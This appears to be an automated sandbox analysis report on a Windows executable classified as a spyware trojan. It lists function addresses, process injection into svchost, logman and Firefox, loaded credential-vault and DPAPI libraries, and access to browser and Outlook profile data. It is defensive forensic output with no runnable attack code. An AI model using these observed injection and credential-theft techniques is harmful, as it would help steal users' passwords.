Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B42840	1_2_03B42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4A840	1_2_03B4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFFFB1	1_2_03BFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B41F92	1_2_03B41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B32FC8	1_2_03B32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B60F30	1_2_03B60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B82F28	1_2_03B82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFFF09	1_2_03BFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB4F40	1_2_03BB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B49EB0	1_2_03B49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B52E90	1_2_03B52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFCE93	1_2_03BFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFEEDB	1_2_03BFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFEE26	1_2_03BFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40E59	1_2_03B40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B58DBF	1_2_03B58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3ADE0	1_2_03B3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5FDC0	1_2_03B5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4AD00	1_2_03B4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF7D73	1_2_03BF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF1D5A	1_2_03BF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B43D40	1_2_03B43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0CB5	1_2_03BE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30CF2	1_2_03B30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFFCF2	1_2_03BFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB9C32	1_2_03BB9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40C00	1_2_03B40C00
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_0294C94B	5_2_0294C94B
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_0294CAE8	5_2_0294CAE8
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_0296D648	5_2_0296D648
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_0294E778	5_2_0294E778
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_0294E76F	5_2_0294E76F
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_0294C998	5_2_0294C998
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_0294E998	5_2_0294E998
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_02955183	5_2_02955183
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_02955188	5_2_02955188
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0335132D	6_2_0335132D
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0328D34C	6_2_0328D34C
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0335A352	6_2_0335A352
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032E739A	6_2_032E739A
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_033603E6	6_2_033603E6
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032AE3F0	6_2_032AE3F0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03340274	6_2_03340274
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032A52A0	6_2_032A52A0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_033412ED	6_2_033412ED
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032BD2F0	6_2_032BD2F0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032BB2C0	6_2_032BB2C0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03290100	6_2_03290100
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0333A118	6_2_0333A118
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D516C	6_2_032D516C
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0328F172	6_2_0328F172
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0336B16B	6_2_0336B16B
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032AB1B0	6_2_032AB1B0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_033601AA	6_2_033601AA
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_033581CC	6_2_033581CC
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0335F0E0	6_2_0335F0E0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_033570E9	6_2_033570E9
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032A70C0	6_2_032A70C0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0334F0CC	6_2_0334F0CC
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032A0770	6_2_032A0770
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032C4750	6_2_032C4750
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0335F7B0	6_2_0335F7B0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0329C7C0	6_2_0329C7C0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032BC6E0	6_2_032BC6E0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_033516CC	6_2_033516CC
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032A0535	6_2_032A0535
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03357571	6_2_03357571
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0333D5B0	6_2_0333D5B0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03360591	6_2_03360591
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0335F43F	6_2_0335F43F
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03291460	6_2_03291460
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03352446	6_2_03352446
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0334E4F6	6_2_0334E4F6
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0335FB76	6_2_0335FB76
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0335AB40	6_2_0335AB40
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032BFB80	6_2_032BFB80
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032DDBF9	6_2_032DDBF9
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03356BD7	6_2_03356BD7
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03313A6C	6_2_03313A6C
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03357A46	6_2_03357A46
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0335FA49	6_2_0335FA49
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032E5AA0	6_2_032E5AA0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0333DAAC	6_2_0333DAAC
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0329EA80	6_2_0329EA80
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0334DAC6	6_2_0334DAC6
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032B6962	6_2_032B6962
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032A9950	6_2_032A9950
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032BB950	6_2_032BB950
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032A29A0	6_2_032A29A0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0336A9A6	6_2_0336A9A6
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032A2840	6_2_032A2840
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032AA840	6_2_032AA840
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032868B8	6_2_032868B8
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032A38E0	6_2_032A38E0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032CE8F0	6_2_032CE8F0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032C0F30	6_2_032C0F30
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0335FF09	6_2_0335FF09
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03314F40	6_2_03314F40
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0335FFB1	6_2_0335FFB1
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032A1F92	6_2_032A1F92
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03292FC8	6_2_03292FC8
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0335EE26	6_2_0335EE26
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032A0E59	6_2_032A0E59
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032A9EB0	6_2_032A9EB0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0335CE93	6_2_0335CE93
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032B2E90	6_2_032B2E90
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0335EEDB	6_2_0335EEDB
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032AAD00	6_2_032AAD00
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03357D73	6_2_03357D73
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032A3D40	6_2_032A3D40
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03351D5A	6_2_03351D5A
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032B8DBF	6_2_032B8DBF
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0329ADE0	6_2_0329ADE0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032BFDC0	6_2_032BFDC0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03319C32	6_2_03319C32
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032A0C00	6_2_032A0C00
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03340CB5	6_2_03340CB5
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0335FCF2	6_2_0335FCF2
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03290CF2	6_2_03290CF2
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A82420	6_2_02A82420
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A7D2E7	6_2_02A7D2E7
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A7D2F0	6_2_02A7D2F0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A9C1C0	6_2_02A9C1C0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A7B660	6_2_02A7B660
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A7B654	6_2_02A7B654
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A7D510	6_2_02A7D510
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A7B510	6_2_02A7B510
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A85B00	6_2_02A85B00
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A83CFB	6_2_02A83CFB
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A83D00	6_2_02A83D00
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0315E358	6_2_0315E358
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0315E474	6_2_0315E474
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_031654C7	6_2_031654C7
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0315CB5A	6_2_0315CB5A
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0315CB67	6_2_0315CB67
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0315E80C	6_2_0315E80C
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0315D8D8	6_2_0315D8D8
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 7_2_05758DA7	7_2_05758DA7
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 7_2_057426E7	7_2_057426E7
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 7_2_05739ED7	7_2_05739ED7
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 7_2_05739ECE	7_2_05739ECE
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 7_2_0573F007	7_2_0573F007
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 7_2_057380F7	7_2_057380F7
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 7_2_0573A0F7	7_2_0573A0F7
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 7_2_057408E7	7_2_057408E7
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 7_2_057408E2	7_2_057408E2
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 7_2_05738247	7_2_05738247
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 7_2_0573823B	7_2_0573823B

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B75130 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BBF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B2B970 appears 250 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B87E54 appears 93 times
Source: C:\Windows\SysWOW64\logman.exe	Code function: String function: 0331F290 appears 103 times
Source: C:\Windows\SysWOW64\logman.exe	Code function: String function: 032D5130 appears 36 times
Source: C:\Windows\SysWOW64\logman.exe	Code function: String function: 0330EA12 appears 84 times
Source: C:\Windows\SysWOW64\logman.exe	Code function: String function: 0328B970 appears 248 times
Source: C:\Windows\SysWOW64\logman.exe	Code function: String function: 032E7E54 appears 85 times

Source: YKzxWyqI6Y.exe, 00000000.00000003.1746935797.0000000004093000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: OriginalFilenamentdll.dllj% vs YKzxWyqI6Y.exe

Source: YKzxWyqI6Y.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@5/3

Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe

File created: C:\Users\user\AppData\Local\Temp\aut222.tmp

Jump to behavior

Source: YKzxWyqI6Y.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: logman.exe, 00000006.00000003.2449065804.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000006.00000003.2449208806.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2942896581.0000000002E34000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: YKzxWyqI6Y.exe	Virustotal: Detection: 55%
Source: YKzxWyqI6Y.exe	ReversingLabs: Detection: 79%

Source: unknown	Process created: C:\Users\user\Desktop\YKzxWyqI6Y.exe "C:\Users\user\Desktop\YKzxWyqI6Y.exe"
Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\YKzxWyqI6Y.exe"
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Process created: C:\Windows\SysWOW64\logman.exe "C:\Windows\SysWOW64\logman.exe"
Source: C:\Windows\SysWOW64\logman.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\YKzxWyqI6Y.exe"	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Process created: C:\Windows\SysWOW64\logman.exe "C:\Windows\SysWOW64\logman.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\logman.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\logman.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: YKzxWyqI6Y.exe

Static file information: File size 1206784 > 1048576

Source: YKzxWyqI6Y.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: YKzxWyqI6Y.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: YKzxWyqI6Y.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: YKzxWyqI6Y.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: YKzxWyqI6Y.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: YKzxWyqI6Y.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: YKzxWyqI6Y.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: logman.pdb source: svchost.exe, 00000001.00000003.2215535374.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2215699757.0000000003432000.00000004.00000020.00020000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000005.00000002.2943277721.00000000007AE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cuwattsjDnLrZm.exe, 00000005.00000002.2942689766.000000000029E000.00000002.00000001.01000000.00000005.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2942690387.000000000029E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: YKzxWyqI6Y.exe, 00000000.00000003.1746935797.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, YKzxWyqI6Y.exe, 00000000.00000003.1747227432.0000000004110000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2155789498.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2153734417.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2247988228.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2943995906.0000000003260000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000006.00000003.2257801921.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2943995906.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000006.00000003.2260281687.00000000030AE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: YKzxWyqI6Y.exe, 00000000.00000003.1746935797.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, YKzxWyqI6Y.exe, 00000000.00000003.1747227432.0000000004110000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2155789498.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2153734417.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2247988228.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, logman.exe, logman.exe, 00000006.00000002.2943995906.0000000003260000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000006.00000003.2257801921.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2943995906.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000006.00000003.2260281687.00000000030AE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: logman.exe, 00000006.00000002.2944473496.000000000388C000.00000004.10000000.00040000.00000000.sdmp, logman.exe, 00000006.00000002.2942896581.0000000002DB4000.00000004.00000020.00020000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000032BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2563084436.000000001646C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: logman.pdbGCTL source: svchost.exe, 00000001.00000003.2215535374.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2215699757.0000000003432000.00000004.00000020.00020000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000005.00000002.2943277721.00000000007AE000.00000004.00000020.00020000.00000000.sdmp
